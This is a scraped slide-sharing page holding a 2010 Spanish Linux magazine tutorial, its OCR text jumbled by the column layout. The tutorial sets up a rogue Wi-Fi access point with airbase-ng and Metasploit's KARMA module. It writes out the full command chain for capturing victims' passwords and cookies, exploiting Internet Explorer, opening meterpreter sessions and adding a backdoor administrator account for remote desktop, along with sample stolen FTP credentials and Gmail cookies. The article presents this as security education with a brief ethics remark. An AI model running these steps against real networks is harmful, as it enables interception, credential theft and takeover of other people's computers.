Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxLolaBunny11
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfJulian Lamprea
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITMaricarmen Sánchez Ruiz
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 

Último (10)

guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 

Airbase y KARMetasploit

  • 1. seguridad Airbase y KARMetasploit Airbase y KARMetasploit: Despliegue de puntos de acceso ilícitos (Rogue AP) Daniel García Gutierrez Cuando nos conectamos a redes Wi-Fi libres desconocidas no sabemos a qué riesgos podemos estar sometidos. En este artículo nos pondremos en el lado del atacante y veremos cómo lanzar un punto de acceso con nuestro adaptador inalámbrico y las herramientas airbase-ng (suite aircrack-ng) y el modulo Karma de Metasploit Framework para la realización de ataques contra los navegadores de los clientes. U n Rogue AP es un punto de acceso inalám- airbase-ng nos permitirá capturar todo tipo de datos de es@lpmagazine.org brico normalmente creado para llevar a ca- los clientes conectados, recopilar información, hacer bo un ataque Man in the Middle (Hombre redirecciones malintencionadas a sitios web para ob- en medio), pudiendo así capturar todo el tener cookies, y realizar todo tipo de ataques contra tráfico que las víctimas envíen (passwords, cookies...). los navegadores de los clientes. Entre otras cosas lo podremos utilizar para: Airbase-ng y KARMetasploit Airbase-ng es una herramienta multi-propósito de la Suite • Capturar passwords de POP3 e IMAP 4 (plano y SSL), Aircrack-ng (http://www.aircrack-ng.org) que nos permite • Capturar correo enviado vía SMTP, levantar un punto de acceso “falso” con nuestro adaptador • Capturar usuarios / passwords de FTP y HTTP, inalámbrico. También es utilizada para atacar a clientes • Obtener cookies de sitios populares (gmail, yahoo, conectados a un punto de acceso con el fin de generar trá- facebook, myspace...), fico y nuevos IVs (Vectores de inicialización), esenciales • Obtener campos de formulario enviados vía HTTP, para romper una clave WEP. • Ataques SMB Relay, En este caso la utilizaremos para simular un punto de • Explotar vulnerabilidades de los navegadores. acceso abierto con servicio DHCP, en el que los clientes que se conecten, se les asignará una IP/DNS/Gateway KARMetasploit guarda todo lo capturado en una base y saldrán a internet normalmente haciendo DNAT con de datos SQLite y si consigue explotar una vulne- iptables en el equipo atacante. rabilidad en el navegador, nos abrirá una sesión de KARMetasploit es un módulo de Metasploit Frame- meterpreter con la que podremos interacturar con el work (http://www.metasploit.com) que utilizándolo con equipo víctima. 34 LiNUX+ 3/2010
  • 2. seguridad Airbase y KARMetasploit Figura 1. Ejecución airbase-ng Material necesario Para realizar todo este proceso necesitaremos un adaptador ina- Figura 2. Configuración de red y arranque del DHCP lámbrico con un chipset que soporte modo monitor y una conexión a internet para que los clientes que se conecten al Falso AP, salgan al ex- Este fichero lo podemos guardar donde queramos, yo lo dejaré en terior y puedan navegar correctamente. Necesitaremos tener instalado la carpeta de metasploit. en nuestra máquina Metasploit Framework y la suite Aircrack-ng. En este artículo utilizaremos BackTrack 4 Final (distribución GNU/Linux Arrancando punto de acceso falso orientada para la auditoría de seguridad) ya que tendremos instaladas Para desplegar el punto de acceso falso con airbase-ng, utilizaremos esas y otras herramientas interesantes. Descarga de BackTrack 4 Final el siguiente comando: (PwnSauce): http://www.backtrack-linux.org/downloads/. # airbase-ng -v -P -C <SEGUNDOS> -e <ESSID> Configuración del punto de acceso falso <interface> Antes que nada, iremos a la carpeta de metasploit y lo actualizaremos a la versión actual: En mi caso crearé un falso AP llamado “WIFI-GRATIS” y utilizare la interfaz wlan1 para ello. # cd /pentest/exploits/framework3/ Antes de nada, pondré la interfaz en modo monitor (lista de chip- # svn update sets compatibles en modo monitor: http://aircrack-ng.org/doku.php? id=compatibility_drivers): # iwconfig wlan1 mode monitor Nos descargamos el módulo karma en la carpeta /pentest/exploits/ Si tenemos problemas, podemos utilizar el script airmon-ng de la framework3: suite aircrack-ng:# airmon-ng start <interface> [canal] Luego, lanzamos el falso AP:# airbase-ng -v -P -C 30 -e # wget http://metasploit.com/users/hdm/tools/karma.rc WIFI-GRATIS wlan1. -o /pentest/exploits/framework3/karma.rc Airbase nos informa que se ha creado una nueva interfaz virtual tap llamada at0 (Figura 1). Para poder utilizarla, levantaremos la in- Instalamos algunos requerimientos: # gem install activerecord terfaz con la dirección IP 10.0.0.1/24 y pondremos nuestro servidor sqlite3-ruby. DHCP a la escucha en ella: Configuración servicio DHCP # ifconfig at0 10.0.0.1 netmask 255.255.255.0 up El cliente cuando se conecte al AP esperará a que se le asigne una di- rección IP por DHCP, entonces tendremos que configurar dhcpd3 pa- Listado 1. Fichero configuración dhcpd.conf ra que asigne la configuración de red a todos los clientes que se aso- cien (Listado 1). Como podemos observar usaremos la red 10.0.0.0/ asoption domain-name-servers 24 y el servidor DHCP asignará IPs desde el rango 10.0.0.100 hasta 208.67.222.222, 208.67.220.220; 10.0.0.254, siendo el router la dirección 10.0.0.1. Los servidores DNS que serán asignados a los clientes, son los default-lease-time 60; de OpenDNS. max-lease-time 72; Tabla 1. Parámetros airbase-ng ddns-update-style none; Parámetro Descripción authoritative; -v Nos va mostrando todo lo que va haciendo. log-facility local7; -P Responder a todas las Pruebas de Sondeo enviadas por los clientes. subnet 10.0.0.0 netmask 255.255.255.0 { -C <segundos> range 10.0.0.100 10.0.0.254; Número de segundos para que los clientes option routers 10.0.0.1; puedan volver a transmitir Solicitudes de Sondeo option domain-name-servers (Probe request) al AP. 208.67.222.222, 208.67.220.220; -e <ESSID> Nombre identificador de la red inalámbrica. } <interface> Nombre interfaz inalámbrica en modo monitor que utilizaremos para simular el falso AP. www.lpmagazine.org 35
  • 3. seguridad Airbase y KARMetasploit Arrancamos el DHCP con el fichero de configuración puesto ante- Comprobando conectividad en el equipo víctima riormente: # dhcpd3 -cf dhcpd.conf at0. Nos conectamos al punto de acceso falso con ESSID WIFI-GRATIS Si todo va correctamente, aparecerá lo siguiente (ver Figura 2). desde el equipo víctima y comprobaremos que sale a internet. Si no os arranca el dhcpd3, puede ser que exista otro proceso activo. Para matarlos utilizaremos: # killall dhcpd3. Atacando clientes con KARMetasploit Cuando un cliente se conecte a nuestro falso AP, se le asignará Una vez configurado el punto de acceso falso, lanzaremos el módulo una IP, pero...¿Cómo hacemos para que salga a internet? karma para que empiece a capturar información y atacar a los clientes Lo que tendremos que hacer, es decir a nuestra máquina que per- conectados. mita la redirección de tráfico ipv4, para ello ejecutaremos el siguiente Tendremos que ir a la carpeta de metasploit, que es donde descar- comando: # echo 1 >/proc/sys/net/ipv4/ip_forward. gamos el módulo karma: # cd /pentest/exploits/framework3/. Si queremos hacer que este cambio sea permanente, tendremos Lanzamos metasploit cargando el módulo karma: # msfconsole que modificar el fichero /etc/sysctl.conf descomentando la varia- -r karma.rc. ble net.ipv4.ip_forward y poniéndola de valor 1, quedando: net. Como podemos ver, crea una base de datos en /root/karma.db ipv4.ip_forward=1. y se pone a cargar módulos como browser_autopwn (redireccio- Para que puedan salir todos los clientes conectados por la misma nes malintencionadas), servidores para capturar logins POP3, dirección IP pública, haremos DNAT (Traducción dinámica de direc- SMTP, IMAP, FTP, HTTP. También carga diversos exploits contra ciones de red) con iptables: # iptables -t nat -A PREROUTING vulnerabilidades de los navegadores, permitiéndonos hasta obte- -i at0 -j REDIRECT. ner una shell en el equipo víctima. Toda la información que vaya Así quedará todo bien configurado para que los clientes que se capturando lo irá metiendo en la base de datos que creó al prin- asocien al punto de acceso falso puedan salir a internet correctamente. cipio, esto nos permitirá ver los datos capturados detenidamente Como el tráfico siempre pasará por la interfaz at0, podemos arrancar cuando queramos. un sniffer como wireshark y analizar todos los paquetes que salen al Utilizaré de víctima un “Windows XP Profesional SP1” para ver exterior. como KARMetasploit aprovecha las vulnerabilidades del Internet Ex- plorer obteniendo una shell del equipo víctima. Desde el equipo víctima conectado al punto de acceso falso, abrimos un sitio web con Internet Explorer y vemos que nos aparece una página con fondo negro que po- ne “Loading...”. Esto lo que hace es redirigir al equipo víctima a sitios webs populares como gmail, facebook, twitter haciéndolo de forma “medio-transparente” para capturar las cookies. También ejecuta en el navegador de la víctima los exploits contra los fallos de los navegado- res. En la ventana del atacante irá mostrando todo lo que va capturando y haciendo en todo momento. Como podemos observar en la siguiente imagen (Figura 6), KARMetasploit se aprovechó de una vulnerabilidad del navegador Figura 3. Comprobación de conectividad Figura 5. Ejecución del navegador en el equipo victima Figura 4. Arranque KARMetasploit Figura 6. Sesión de meterpreter creada 36 LiNUX+ 3/2010
  • 4. seguridad Airbase y KARMetasploit Internet Explorer y nos avisa de que se ha creado una sesión de me- Para volver al Meterpreter, ejecutaremos exit. Si queremos terpreter en el equipo 10.0.0.106. obtener la lista de funciones que podemos utilizar, ejecutamos el comando help. ¿Qué es meterpreter? Meterpreter o meta-intérprete son unos plugins avanzados de Me- Activando escritorio remoto tasploit framework para utilizar bajo sistemas Windows comprome- Desde meterpreter podremos cargar otros scripts bastante intere- tidos, permitiéndonos realizar diversas funciones sin crear procesos santes como getgui, que nos permite activar el escritorio remoto de adicionales en la máquina víctima, entre ellas: Windows (RDP) y a la vez crearnos un usuario administrador. Para lanzar el script, ejecutaremos la orden: • Leer, descargar, subir, editar y borrar ficheros, • Mostrar directorio de trabajo, meterpreter> run getgui. • Crear directorios, • Ejecutar comandos del sistema, Si lo ejecutamos sin parámetros nos mostrará la ayuda (Tabla 2). • Ver y modificar configuración de red, • Editar registro, Tabla 2. Parámetros getgui • Añadir usuarios, grupos, Parámetro Descripción • Arrancar escritorio remoto, -e Habilita únicamente RDP en la máquina víctima. • Arrancar un sniffer, keylogger..., -u <usuario> Nombre para el usuario a crear. También habilita RDP. • Dumpear la SAM. -p <clave> Password para el usuario. Como vimos en la imagen anterior (ver Figura 6), se pudo explotar la vulnerabilidad del Internet Explorer y se abrió una sesión de Meter- Listado 2. Registros tabla hosts preter en segundo plano. Si se conectaran más clientes al punto de ac- ceso falso con vulnerabilidades en los navegadores, se irán abriendo sqlite> select * from hosts; más sesiones de meterpreter ya que es el payload utilizado en todos 1|2010-01-20 20:37:14|10.0.0.119 los exploits que se ejecutan. |||||unknown||Windows|XP|SP2|es|x86|1 2|2010-01-20 23:35:42|10.0.0.106 Abriendo sesion meterpreter |||||unknown||Windows|XP|undefined|es-ES|x86|1 Una vez las víctimas hayan picado en el anzuelo, podremos pulsar 3|2010-01-20 20:45:43|10.0.0.121 CTRL+C para poder ejecutar comandos en Metasploit. Utilizaremos |||||unknown|||||||1 el comando sessions para interactuar con las sesiones creadas por 4|2010-01-20 21:28:58|10.0.0.104 meterpreter. |||||unknown|||||||1 Ver listado de sesiones creadas: # sessions -l. 5|2010-01-20 21:58:19|10.0.0.123 Vemos que tenemos shell meterpreter en el equipo 10.0.0.106. |||||unknown||Windows|XP|undefined|es|x86|1 con Identificador: 1 (Figura 7). Para utilizar una sesión, tendremos que ejecutar: # sessions -i <ID_Sesion>. En nuestro caso: # sessions -i 1. Listado 3. Notas del equipo con host_id = 2 Esto nos abrirá la sesión 1 de meterpreter que fue creada en el equipo víctima. sqlite> select * from notes where host_id=2; Si queremos interactuar directamente con la consola de Windows 802|2010-01-21 00:00:15|auth.ftp|--- en vez de con meterpreter, ejecutaremos el comando 'shell'. Aquí po- :targ_host: XXX.XXX.XXX.XX dremos ejecutar los comandos que nos vengan al antojo. :pass: toor :targ_port: "21" :user: root |1||2 ......... 711|2010-01-20 23:35:41|http_ cookies|gmail.google.com PREF=ID= 05aa4f5170ecdf51:U=bdc3782d1406e6d3:TM= 1263927119:LM=1263927412:S= Yr0MOnA4A42OohNL; NID=31= CrFGymeOCASXIr9cS_gKDdB7Swrn KEw60BP369Nhg8jMaH69Nsrqr5k_ YcM6nGOiRbpBZuKPWPEyNIDovMCF0 g8tmV1UZBrIr8WZcdCT0j-bzUpQQWuub4nQW0d4qWr6|1||2 Figura 7. Lista de sessiones meterpreter www.lpmagazine.org 37
  • 5. seguridad Airbase y KARMetasploit Crearemos un usuario llamado “owner” con password “12345”: meterpreter> run getgui -u owner -p 12345. Ahora nos podremos conectar al equipo víctima por escritorio re- moto y con privilegios de administrador: # rdesktop 10.0.0.106. Accediendo a la información registrada por KARMetasploit Otra forma de ver los datos que hemos capturado de los clientes, es conectarnos a la base de datos sqlite3 que nos crea el módulo karma en /root/karma.db. Para conectarnos a la base de datos ejecutaremos el comando: # sqlite3 /root/karma.db Figura 10. Conexión escritorio remoto con el equipo victima Esto nos devolverá una consola de sqlite3. Si queremos observar las estructuras de las tablas creadas, ejecutamos: sqlite> .schema En la tabla “hosts” podemos encontrar las máquinas detectadas por karma (Listado 2). En la tabla “notes” encontraremos cookies y passwords captura- dos de los clientes. Si queremos ver las notas capturadas de la máqui- na 10.0.0.106, que es el host_id 2, podemos ejecutar la consulta: select * from notes where host_id=2 ; También tenemos la opción de inspeccionar la base de datos de una forma más cómoda con una GUI de sqlite3 llamada “sqlitebrow- Figura 11. Registros tabla hosts ser”. Para instalarla en Debian o derivados: Abrir base de datos con sqlitebrowser: # apt-get install sqlitebrowser # sqlitebrowser /root/karma.db Conclusión Como podemos ver, estas herramientas nos dan bastante juego y pue- den llegar a ser bastante peligrosas en manos de una persona con malas intenciones. Éticamente podemos utilizar todo esto para el estudio de redes Wi-Fi (802.11), comprobar la seguridad de nuestros equipos, con- cienciarnos de utilizar protocolos seguros y por supuesto conocer a qué tipo de ataques podemos ser sometidos si nos conectamos a un punto de acceso desconocido o suplantado. Figura 8. Consola Windows desde meterpreter Sobre el autor Daniel García Gutierrez (danigargu@gmail.com) es un gran afi- cionado a la programación y la seguridad informática. Viviendo actualmente en la provincia de Burgos, dedica la mayor parte de su tiempo libre a la investigación de la seguridad informática, en concreto, seguridad web, contando en esto con más de 4 años de experiencia. Actualmente se encuentra programando en el lenguaje PERL un analizador de código para la detección de vulnerabi- lidades en scripts PHP, pudiéndonos ayudar esto a comprobar si nuestros códigos son posiblemente vulnerables a diferentes Figura 9. Habilitando escritorio remoto tipos de ataques conocidos en la actualidad. 38 LiNUX+ 3/2010